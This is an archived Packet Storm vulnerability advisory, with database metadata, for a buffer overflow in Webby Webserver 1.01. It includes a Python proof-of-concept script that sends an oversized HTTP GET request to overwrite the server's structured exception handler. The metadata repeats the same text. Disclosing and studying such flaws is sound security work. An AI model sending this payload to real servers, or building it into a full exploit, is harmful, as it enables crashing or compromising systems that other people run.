ID PACKETSTORM:89942
Type packetstorm
Reporter Michael Messner
Modified 2010-05-26T00:00:00
Description
`---------------------------------------------
Webby Webserver v1.01
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)
Date: 25.05.2010
---------------------------------------------
- Description
Webby is a small webserver for the windows operating system.
- buffer overflow vulnerability
The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs.
- Solution
No known solution available.
No contact details of the author found.
- Credits
The vulnerability was discovered by Michael Messner from Integralis
michael#dot#messner#at#integralis#dot#com
- Timeline
25.05.2010 - Vulnerability discovered
- Reference
Download vulnerable software
http://www.shareware.de/webby-webserver/
- POC
#!/usr/bin/python
import socket
import sys
import os.path
import time
if len(sys.argv) < 2:
print "Usage: webby.py <IP> <port>"
sys.exit(0)
ips = sys.argv[1]
port = int(sys.argv[2])
string = "A"*790
string += "\x90"*4
string += "\x42"*105
method = "GET"
print "starting POC for:", ips
print ""
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)
payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'
print "\r\nsending payload"
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))
print "..."
print payload
s.send(payload)
print "finished with method %s and payload %s" % (method,payload)
print "... check SEH"
`
{"type": "packetstorm", "published": "2010-05-26T00:00:00", "reporter": "Michael Messner", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "ff747716ac85d4afe083f861caf3a1a9"}, {"key": "modified", "hash": "b42c3d7c50efa70bd986544cd93fb1fe"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b42c3d7c50efa70bd986544cd93fb1fe"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ed3c0a8702555b117e82620dda0d708a"}, {"key": "sourceData", "hash": "d8cf475705a57bb6a242520f8a6e0e8f"}, {"key": "sourceHref", "hash": "e55b4dffc71fcefab638cfbf6cd2f40f"}, {"key": "title", "hash": "0e524d59ecd141d20c4ba97334327c29"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`--------------------------------------------- \n \nWebby Webserver v1.01 \n- Buffer overflow vulnerability with overwritten structured exception handler (SEH) \nDate: 25.05.2010 \n \n--------------------------------------------- \n \n- Description \n \nWebby is a small webserver for the windows operating system. \n \n- buffer overflow vulnerability \n \nThe vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs. \n \n- Solution \n \nNo known solution available. \nNo contact details of the author found. \n \n- Credits \n \nThe vulnerability was discovered by Michael Messner from Integralis \nmichael#dot#messner#at#integralis#dot#com \n \n- Timeline \n \n25.05.2010 - Vulnerability discovered \n \n- Reference \n \nDownload vulnerable software \nhttp://www.shareware.de/webby-webserver/ \n \n- POC \n \n#!/usr/bin/python \n \nimport socket \nimport sys \nimport os.path \nimport time \n \nif len(sys.argv) < 2: \nprint \"Usage: webby.py <IP> <port>\" \nsys.exit(0) \n \nips = sys.argv[1] \nport = int(sys.argv[2]) \n \nstring = \"A\"*790 \nstring += \"\\x90\"*4 \nstring += \"\\x42\"*105 \n \nmethod = \"GET\" \nprint \"starting POC for:\", ips \nprint \"\" \n \ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM) \ntry: \nconnect=s.connect((ips, port)) \nexcept: \nprint \"no connection possible\" \nsys.exit(1) \n \npayload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\\x0d\\x0a\\x0d\\x0a' \n \nprint \"\\r\\nsending payload\" \nprint \"\\n\\rusing methode %s with buffersize of: %s\" % (method,str(len(string))) \nprint \"...\" \n \nprint payload \ns.send(payload) \nprint \"finished with method %s and payload %s\" % (method,payload) \nprint \"... check SEH\" \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:28:16", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/89942/Webby-Webserver-1.01-Buffer-Overflow.html", "sourceHref": "https://packetstormsecurity.com/files/download/89942/webby-overflow.txt", "title": "Webby Webserver 1.01 Buffer Overflow", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2016-11-03T10:28:16"}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:16"}, "vulnersScore": 0.7}, "references": [], "id": "PACKETSTORM:89942", "hash": "a8bea79f996408678118f3fd2c9b930ab0cfd450aff7922246bbfba04c7393fa", "edition": 1, "cvelist": [], "modified": "2010-05-26T00:00:00", "description": ""}
{}
